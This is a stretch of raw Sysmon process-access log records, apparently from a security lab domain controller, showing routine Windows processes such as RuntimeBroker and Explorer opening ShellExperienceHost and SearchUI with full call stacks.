12:30:01.456{FE4C2B44-DDF7-63C7-B204-00000000AF02}48486520C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+aea4a|C:\Windows\System32\combase.dll+a580d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65413|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+6176d|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+7c319|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+3528e|C:\Windows\System32\RPCRT4.dll+20c07 10341000x800000000000000046527Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.440{FE4C2B44-DDF7-63C7-B204-00000000AF02}48486520C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+aea4a|C:\Windows\System32\combase.dll+a580d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65413|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+6176d|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+7c319|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+3528e|C:\Windows\System32\RPCRT4.dll+20c07 10341000x800000000000000046526Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.440{FE4C2B44-DDF7-63C7-B204-00000000AF02}48486004C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7e2|C:\Windows\System32\combase.dll+63d23|C:\Windows\System32\combase.dll+3e9ed|C:\Windows\System32\combase.dll+6207f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536|C:\Windows\System32\combase.dll+5dcea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000046525Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.440{FE4C2B44-DDF7-63C7-B204-00000000AF02}48486004C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7e2|C:\Windows\System32\combase.dll+63d23|C:\Windows\System32\combase.dll+3e9ed|C:\Windows\System32\combase.dll+6207f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536|C:\Windows\System32\combase.dll+5dcea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000046524Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.440{FE4C2B44-DDF7-63C7-B204-00000000AF02}48484560C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7e2|C:\Windows\System32\combase.dll+63d23|C:\Windows\System32\combase.dll+3e9ed|C:\Windows\System32\combase.dll+6207f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536|C:\Windows\System32\combase.dll+5dcea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000046523Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.440{FE4C2B44-DDF7-63C7-B204-00000000AF02}48484560C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7e2|C:\Windows\System32\combase.dll+63d23|C:\Windows\System32\combase.dll+3e9ed|C:\Windows\System32\combase.dll+6207f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536|C:\Windows\System32\combase.dll+5dcea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000046522Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.440{FE4C2B44-DDF7-63C7-B204-00000000AF02}48486004C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7e2|C:\Windows\System32\combase.dll+63d23|C:\Windows\System32\combase.dll+3e9ed|C:\Windows\System32\combase.dll+6207f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536|C:\Windows\System32\combase.dll+5dcea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000046521Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.440{FE4C2B44-DDF7-63C7-B204-00000000AF02}48486004C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7e2|C:\Windows\System32\combase.dll+63d23|C:\Windows\System32\combase.dll+3e9ed|C:\Windows\System32\combase.dll+6207f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536|C:\Windows\System32\combase.dll+5dcea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000046520Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.440{FE4C2B44-DDF7-63C7-B204-00000000AF02}48485092C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+aea4a|C:\Windows\System32\combase.dll+a580d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65413|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+6176d|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+7c319|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+3528e|C:\Windows\System32\RPCRT4.dll+20c07 10341000x800000000000000046519Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.440{FE4C2B44-DDF7-63C7-B204-00000000AF02}48482544C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+aea4a|C:\Windows\System32\combase.dll+a580d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65413|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+6176d|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+7c319|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+3528e|C:\Windows\System32\RPCRT4.dll+20c07 10341000x800000000000000046518Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.440{FE4C2B44-DDF7-63C7-B204-00000000AF02}48486748C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7e2|C:\Windows\System32\combase.dll+63d23|C:\Windows\System32\combase.dll+3e9ed|C:\Windows\System32\combase.dll+6207f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536|C:\Windows\System32\combase.dll+5dcea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000046517Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.440{FE4C2B44-DDF7-63C7-B204-00000000AF02}48486748C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7e2|C:\Windows\System32\combase.dll+63d23|C:\Windows\System32\combase.dll+3e9ed|C:\Windows\System32\combase.dll+6207f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536|C:\Windows\System32\combase.dll+5dcea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000046516Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.440{FE4C2B44-DDF7-63C7-B204-00000000AF02}48485092C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+aea4a|C:\Windows\System32\combase.dll+a580d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65413|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+6176d|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+7c319|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+3528e|C:\Windows\System32\RPCRT4.dll+20c07 10341000x800000000000000046515Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.424{FE4C2B44-DDF7-63C7-B204-00000000AF02}48486004C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+aea4a|C:\Windows\System32\combase.dll+a580d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65413|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+6176d|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+7c319|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+3528e|C:\Windows\System32\RPCRT4.dll+20c07 10341000x800000000000000046514Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.299{FE4C2B44-DDF7-63C7-B204-00000000AF02}48486004C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aea4a|C:\Windows\System32\combase.dll+a580d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65413|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+6176d|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+7c319|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d 10341000x800000000000000046513Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.299{FE4C2B44-DDF7-63C7-B204-00000000AF02}48486004C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aea4a|C:\Windows\System32\combase.dll+a580d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65413|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+6176d|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+7c319|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d 10341000x800000000000000046512Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.299{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200980C:\Windows\Explorer.EXE{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+1088a6|C:\Windows\System32\TwinUI.dll+82197|C:\Windows\System32\TwinUI.dll+be23e|C:\Windows\System32\TwinUI.dll+be209|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046511Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.299{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200980C:\Windows\Explorer.EXE{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+1088a6|C:\Windows\System32\TwinUI.dll+82197|C:\Windows\System32\TwinUI.dll+be23e|C:\Windows\System32\TwinUI.dll+be209|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046510Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.284{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046509Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.284{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046508Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 